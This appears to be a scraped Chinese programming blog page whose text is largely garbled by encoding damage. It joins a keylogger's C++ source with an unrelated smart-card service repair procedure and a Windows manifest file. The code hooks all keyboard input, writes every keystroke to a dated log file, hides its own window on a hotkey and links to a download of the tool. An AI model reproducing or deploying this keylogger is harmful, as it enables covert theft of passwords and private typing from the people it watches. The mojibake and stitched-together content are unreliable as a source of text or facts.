锘??xml version="1.0" encoding="utf-8" standalone="yes"?>

閽╁瓙鍥炶皟鍑芥暟涓殑浠g爜錛?br>
LRESULT CALLBACK LowLevelKeyboardProc(int nCode,
WPARAM wParam,
LPARAM lParam
)

{
PKBDLLHOOKSTRUCT kbhs=(PKBDLLHOOKSTRUCT)lParam;
if (nCode<0)
{
return CallNextHookEx(hhKeyboard,nCode,wParam,lParam);
}
if (HC_ACTION==nCode)
{
if (WM_KEYDOWN==wParam || WM_SYSKEYDOWN==lParam)
{
if (VK_F4==kbhs->vkCode)
{
//鍏堝垽鏂獥鍙f槸show or hide
m_hWnd2=FindWindow(NULL,L"KeyboardLoger Prees [F4] to hide or show me.");
if (IsWindowVisible(m_hWnd2))
{
ShowWindow(m_hWnd2,SW_HIDE);
return 0;
}
else
{
if (NULL==m_hWnd2)
{
AfxMessageBox(L"鏌ユ壘澶辮觸錛?/span>");
return 0;
}
ShowWindow(m_hWnd2,SW_RESTORE);
//UpdateWindow(m_hWnd);
BringWindowToTop(m_hWnd);
SetForegroundWindow(m_hWnd);
return 1;
}
}
char c[1]; 
c[0]=kbhs->vkCode; 
SaveLog(c);
}
}
return CallNextHookEx(hhKeyboard,nCode,wParam,lParam);
}
瀛楃淇濆瓨鐨勪唬鐮侊細
void SaveLog(char* c)

{
//AfxMessageBox(L"榪涘叆瀛樺偍紼嬪簭");
CTime tm=CTime::GetCurrentTime(); 
CString name;
TCHAR* szPath[MAX_PATH];
::GetModuleFileName(GetModuleHandle(L"LogerDll"),(LPTSTR)szPath,MAX_PATH);
CString path=(LPTSTR)szPath;
path.Replace(L"\\LogerDll.dll",L"");
name.Format(L"\\Key_%d_%d.log",tm.GetMonth(),tm.GetDay());
path+=name;

CFile file; 
if(!file.Open(path,CFile::modeReadWrite)) 

{ 
file.Open(path,CFile::modeCreate|CFile::modeReadWrite); 
} 
file.SeekToEnd(); 
file.Write(c,1); 
file.Close(); 

}
涓嬭澆鍦板潃錛?a href="http://m.shnenglu.com/Files/pencil/KeyboardLoger.rar">http://m.shnenglu.com/Files/pencil/KeyboardLoger.rar

銆愭櫘閫氫慨澶嶃戠殑淇榪囩▼錛堜互XP涓嬬殑淇榪囩▼璁茶堪錛寁ista/win7涓嬫搷浣滆鐪嬩唬鐮侊級錛?br>錛?錛夋鏌?鏅鴻兘鍗℃湇鍔?鏄惁涓鴻嚜鍚姩銆傚茍璁劇疆鍏朵負鑷惎鍔ㄣ?br>錛?錛夋嫻嬫湇鍔″綋鍓嶇姸鎬佹槸鍚︿負SERVICE_RUNNING錛屽茍璁劇疆鍏剁姸鎬佷負榪愯涓?br>錛?錛夋嫻嬪墠涓ゆ鏄惁鎴愬姛錛屽鏋滄垚鍔熷垯鍚戠敤鎴峰脊鍑簃essagebox璇㈤棶moveable device鍔熻兘鏄惁姝e父銆?br>錛?錛夊鏋滃姛鑳戒粛abnormal,鍒欏垵姝ュ垽鏂槸鏈嶅姟鐧婚檰璐︽埛涓洪潪"NT AUTHORITY\LocalService" 錛屽垯鐢–reateProcess鏉ヨ繍琛?sc.exe config SCardSvr obj= \"NT AUTHORITY\LocalService" password= "" 錛屾敼鍙樺叾鐢ㄦ埛涓簂ocalservice(smart card service鍙湁鍦ㄦ鐧婚檰璐︽埛涓嬫墠姝e父榪愯)銆?/p>
錛?錛夊鏋滃湪鏅氫慨澶嶈繃紼嬩腑閬囧埌鏈嶅姟鏌ヨ涓嶅埌絳塭rror鏃訛紝紼嬪簭鑷姩鍚姩寮哄姏淇鏉ュ畨瑁卻mart card service.
娉ㄦ剰錛氭櫘閫氫慨澶嶄腑鐨勭3錛?姝ヤ腑鏈夌偣闂錛屽湪榪欎釜鍦版柟鍏跺疄鏈濂芥槸鐩存帴媯鏌ユ湇鍔$殑鐧婚檰璐︽埛銆傜劧鍚庡仛鍑虹浉搴旂殑鍔ㄤ綔錛屼絾鏄垜榪欎釜鍦版柟娌℃湁鎯沖埌瀹炵幇鐨勫姙娉曘傛湜鍓嶈緢鎻愮ず銆傚彟澶栧氨鏄痵c鐨勫懡浠ゆ牸寮忔湁涓ユ牸鐨勯檺鍒訛紝緙栫爜鐨勬椂鍊欒娉ㄦ剰絳夊彿鍚庨潰棣栧厛鏄┖鏍箋傛垜褰撴椂琚繖涓┖鏍煎洶鎵板埌浜嗐?/p>
銆愬己鍔涗慨澶嶃戠殑淇榪囩▼錛圶P涓嬬殑淇錛寁ista/win7 涓嬫病鏈夊己鍔涗慨澶嶏級
鍏跺疄寮哄姏淇鐨勮繃紼嬪氨鏄綉涓婃祦浼犵殑閭d釜淇榪囩▼錛屾垜鍙笉榪囧湪榪欎釜淇榪囩▼涓鍔犱簡楠岃瘉鍜岄厤緗慨鏀廣?br>淇榪囩▼錛?br>錛?錛塖cardSvr.exe reinstall
錛?錛塺egsvr32.exe SCardssp.dll
錛?錛塻c.exe config SCardSvr obj= \"NT AUTHORITY\LocalService" password= ""
錛?錛夐氳繃浠ヤ笂涓夋涔嬪悗錛屽墿涓嬬殑閰嶇疆淇敼灝辮窡鏅氫慨澶嶈繃紼嬩竴鏍蜂簡銆傝屼互涓婁笁姝ラ氳繃CreateProcess鍜學aitForSingleObject鏉ラ厤鍚堟帶鍒躲?/p>
搴旇宸笉澶氫簡銆備唬鐮佹槸鍗婁釜鏈堝墠鍐欑殑錛屼竴浜涘湴鏂瑰彲鑳芥湁鐤忔紡銆?br>鍦ㄤ唬鐮佸疄鐜頒腑榪樻湁寰堝鍦版柟闇瑕佹敞鎰忥紝鎴戜篃閮藉湪浠g爜涓仛鍑轟簡娉ㄩ噴銆傚彲鑷鏌ョ湅銆?/p>
濡傞渶浜ゆ祦錛屽彲mailto:pencil@yeah.net MSN:pencil@yeah.net
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
name="XP style manifest"
processorArchitecture="x86"
version="1.0.0.0"
type="win32"/>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="x86"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>